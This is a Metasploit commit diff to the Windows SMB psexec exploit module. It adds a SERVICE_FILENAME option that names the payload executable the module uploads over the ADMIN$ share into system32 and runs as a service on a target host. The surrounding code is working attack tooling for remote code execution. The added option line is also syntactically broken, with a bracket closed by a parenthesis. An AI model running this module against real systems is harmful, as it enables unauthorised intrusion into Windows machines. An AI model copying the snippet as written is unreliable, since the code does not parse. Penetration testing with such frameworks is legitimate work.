Allow user ability to set filename for psexec service binary

mubix · mubix · commit 71c68d09c1f4 · 2013-05-07T15:26:22.000-03:00
This should probably be higher up for all
generate_payload_exe but would take a major edit
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
@@ -82,7 +82,8 @@ def initialize(info = {})
 		register_advanced_options(
 			[
 				OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true]),
-				OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false])
+				OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]),
+				OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil)
 			], self.class)
 	end
 
@@ -133,7 +134,7 @@ def exploit
 				return
 			end
 			simple.connect("ADMIN$")
-			filename = rand_text_alpha(8) + ".exe"
+			datastore['SERVICE_FILENAME'] ? filename = datastore['SERVICE_FILENAME'] : filename = rand_text_alpha(8) + ".exe"
 			exe = generate_payload_exe
 			fd = smb_open("\\system32\\#{filename}", 'rwct')
 			fd << exe
@@ -152,7 +153,7 @@ def exploit
 			# Disconnect from the ADMIN$
 			simple.disconnect("ADMIN$")
 		else
-			filename = rand_text_alpha(8) + ".exe"
+			datastore['SERVICE_FILENAME'] ? filename = datastore['SERVICE_FILENAME'] : filename = rand_text_alpha(8) + ".exe"
 			servicename = rand_text_alpha(8)
 
 			# Upload the shellcode to a file
